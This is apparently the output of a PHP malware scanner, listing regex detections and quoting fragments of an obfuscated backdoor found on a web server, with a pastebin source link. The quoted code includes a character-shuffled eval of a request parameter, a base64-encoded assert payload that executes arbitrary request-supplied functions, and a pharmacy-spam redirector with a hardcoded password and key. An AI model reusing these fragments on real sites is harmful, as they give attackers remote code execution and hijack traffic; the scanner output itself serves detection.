Detected 1 occurrence(s) of ‘\?php.*(eval|urldecode)\(.*\>’: <?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['na1bc75'];if(isset($s22)){eval($s21($s22));}?> <?php //###==### assert("e"."v"."a"."l(b"."a"."s"."e"."6"."4_d"."e"."c"."o"."d"."e('aWYgKCFpc3NldCgkaW5kZ2V0KSkgewpjaG1vZCgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10sIDA0NDQpOwplcnJvcl9yZXBvcnRpbmcoMCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTsKaWYoIWVtc Detected 1 occurrence(s) of ‘\s*pass[word]+\s*[:=]\s*["'][a-z0-9\-_\!\$]+["']‘: Ck7CiAgICBsaXN0KCRoZWFkZXIsICRib2R5KSA9IHByZWdfc3BsaXQoIi9cUlxSLyIsICRyZXNwLCAyKTsKICAgICRpbmRnZXQgPSAkYm9keTsKZWNobyAkaW5kZ2V0Owp9Cn0KJF9SRVFVRVNUWydmJ10oJF9SRVFVRVNUWydjJ10pOwp9'))"); //###==### ?> <?$tds="http://fbt.yahoo.com/counter.php"; $password="fff123106f3430"; $g="http://mypillshop.ru"; $esdid="counter3"; $key="zzzzgb54y45yb45tktbwtberheh6e4wh"; ?><?//BREACK//?><?php error_reporting(0);$a=str_split($password.'2','3');$p='0';$a[3]=str_replace('f','0',$a[3])+3;$p.=$a[4];$p.='.0';$p.=' ';$a[3]++;$p.='.0'.$a[2 Detected 2 occurrence(s) of '(fopen|file)\(.*\$(GET|POST)': str_replace('f','0',$a[1]);$t=$t.';';if($_GET['mode']=='config' and $_GET['key']==$key){echo'{pkey" value="'.$key.'"}';}if($_GET["mode"]=="setconfig" AND $key==$_GET['key']){$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$jng=$getlpa[0];$v=file($scr);for($i=0;$i<sizeof($v);$i++)if($i==0) {$ka='<?//BRE';$c=$ka.'ACK//?>';$b = explode($c, $v[$i]);$v[$i]='<? ?>'.$c.$b[1];}$d=fopen($scr,"w");fputs($d,implode("",$v));fclose($d);}$s = explode("/", $tds);$s=$s[2];$u=$s;if($p){$s=$p;}$t=sub Source: http://pastebin.com/raw.php?i=dhHyJPAG
↧